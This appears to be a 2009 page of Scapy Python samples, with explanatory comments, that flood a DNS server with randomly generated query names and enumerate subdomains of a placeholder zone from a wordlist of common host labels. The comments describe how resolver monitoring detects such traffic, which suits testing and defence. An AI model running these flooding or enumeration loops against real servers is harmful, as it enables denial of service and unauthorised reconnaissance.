Scapy DNS
Some Scapy samples for testing / flooding a DNS server with random queries
Fully Random Queries
# Sends 1000 recursive (rd=1) DNS queries to 192.168.0.1, each for a name made
# of three random labels whose lengths come from RandNum(1,50), RandNum(1,20)
# and RandNum(2,3). Every query name is freshly generated, so a resolver cannot
# answer from cache. On the receiving side this shows up as a burst of unique,
# random-looking names from a single source, presumably answered mostly with
# NXDOMAIN -- the pattern that query-rate limits and NXDOMAIN-ratio alerts on a
# test resolver are meant to catch.
# The Scapy names (RandString, RandNum, RandShort, send, IP, UDP, DNS, DNSQR)
# are expected to be in scope already, e.g. inside the interactive scapy shell.
for i in range(1000):
    labels = [
        RandString(RandNum(1, 50)).lower(),
        RandString(RandNum(1, 20)).lower(),
        RandString(RandNum(2, 3)).lower(),
    ]
    q = ".".join(labels)
    print("%s %s" % (i, q))
    # send() transmits at layer 3 and does not wait for a reply
    send(IP(dst="192.168.0.1") / UDP(sport=RandShort()) / DNS(rd=1, qd=DNSQR(qname=q)))

# The original used for/else without any break, so this message is always
# printed exactly once after the last iteration.
print('The for loop is over')
One Domain
# Queries random host labels under one fixed domain (domain + top_level) and
# waits for each answer. Because only the left-most label changes, every query
# is a cache miss for the same zone; a recursive resolver has to forward each
# one to that zone's authoritative servers. Seen from the resolver, this is a
# run of unique sub-names of a single domain from one client, which per-zone
# query counters and NXDOMAIN-rate monitoring should surface.
# The Scapy names are expected to be in scope already (interactive scapy shell).
top_level = ".ch"
domain = "target"
cnt = 1000
dns_server = "10.0.0.1"

for i in range(cnt):
    # random label, length taken from RandNum(1,8), lower-cased
    label = RandString(RandNum(1, 8)).lower()
    q = "%s.%s%s" % (label, domain, top_level)
    print("%s %s" % (i, q))
    # sr1() sends one query and waits for the first reply; the reply is
    # discarded here. No timeout is passed, so a query that is never answered
    # stalls the loop.
    sr1(IP(dst=dns_server) / UDP(sport=RandShort()) / DNS(rd=1, qd=DNSQR(qname=q)))
Some Top-Level Domains
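# Sends 100 recursive (rd=1) DNS queries to 192.168.0.1 for names of the form
# <random label>.<random label><suffix>, where the suffix is picked from the
# fixed list `top`. Unlike fully random names, these end in real top-level
# domains, so a recursive resolver has to ask the TLD servers before it can
# answer; on the resolver this appears as many unique second-level names
# spread across a few TLDs from one source.
# The Scapy names and the `random` module are expected to be in scope already
# (the original snippet relied on both as well).

# ".com" is listed twice, which makes it twice as likely to be chosen as any
# other suffix -- possibly unintended; kept as on the page.
top = [".com", ".net", ".com", ".edu", ".ch", ".de", ".li", ".jp", ".ru", ".tv", ".nl", ".fr"]
anz_top = len(top)

for i in range(100):
    host_label = RandString(RandNum(1, 50)).lower()
    domain_label = RandString(RandNum(1, 20)).lower()
    # The original wrote `t = top_level=top[...]`, which also rebound the
    # `top_level` variable used by the one-domain sample when both are run in
    # the same session. random.choice() picks uniformly from the list without
    # that side effect; the entries are already lower case.
    suffix = random.choice(top)
    q = host_label + "." + domain_label + suffix
    print("%s %s" % (i, q))
    # send() transmits at layer 3 and does not wait for a reply
    send(IP(dst="192.168.0.1") / UDP(sport=RandShort()) / DNS(rd=1, qd=DNSQR(qname=q)))

# The original used for/else without any break, so this message is always
# printed exactly once after the last iteration.
print('The for loop is over')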
DNS Enumeration Sample
#!/usr/bin/python
from scapy.all import *
# Settings for the enumeration run: the zone to probe and the DNS server that
# receives the queries.
domain = "target.ch"
dns_server = "10.0.0.1"

# Candidate host labels, tried in this order as <label>.<domain>.
# Kept exactly as on the page: "telnet" and "noc" appear twice (so they are
# queried twice), and "delevlop" looks like a typo for "develop".
server = (
    "www www1 www2 ns ns1 ns2 dns dns1 dns2 dns3 pop mail smtp "
    "pop3 test dev ads adserver adsl agent channel dmz sz client imap "
    "http https ftp ftpserver tftp ntp ids ips snort imail pops "
    "imaps irc linux windows log install blog host printer public sql "
    "mysql router cisco switch telnet voip webmin ssh delevlop pub root "
    "user xml ww telnet extern intranet extranet testing default gateway "
    "radius noc mobile customer chat siprouter sip nms noc office "
    "voice support spare owa exchange"
).split()

# One result per entry of `server`, filled in by the query loop.
serverans = list()
cnt = len(server)

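# Look up every candidate name <label>.<domain> on dns_server and store one
# result per label in serverans, in the same order as `server`.
# On the server side this is a run of lookups for common service labels under
# one zone from a single client, which DNS query logging can surface.
for host in server:
    q = host + "." + domain
    # timeout (2 s, an arbitrary choice): without it sr1() keeps waiting for a
    # query that is never answered and the run stalls.
    ans = sr1(IP(dst=dns_server) / UDP(sport=RandShort()) / DNS(rd=1, qd=DNSQR(qname=q)), timeout=2)
    if ans is None or not ans.haslayer(DNS):
        # sr1() returns None when nothing came back, and a reply without a DNS
        # layer (e.g. an ICMP error) cannot be indexed with ans[DNS]; the
        # original crashed here instead of recording the miss.
        print("%s %s" % (q, "no response"))
        serverans.append("no response")
    elif ans[DNS].ancount == 0:
        # a DNS reply with no answer records
        print("%s %s" % (q, "unkown"))
        serverans.append("unkown")
    else:
        # Only the first DNSRR in the reply is read; if that record is a CNAME,
        # rdata is presumably the alias target rather than an address.
        rdata = ans[DNSRR].rdata
        print("%s %s" % (q, rdata))
        serverans.append(rdata)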

# Summary: print every probed name next to the result recorded for it.
for idx, host in enumerate(server):
    print("%s %s" % (host + "." + domain, serverans[idx]))

(c) 2009 by packetlevel.ch / last update: 27.09.2009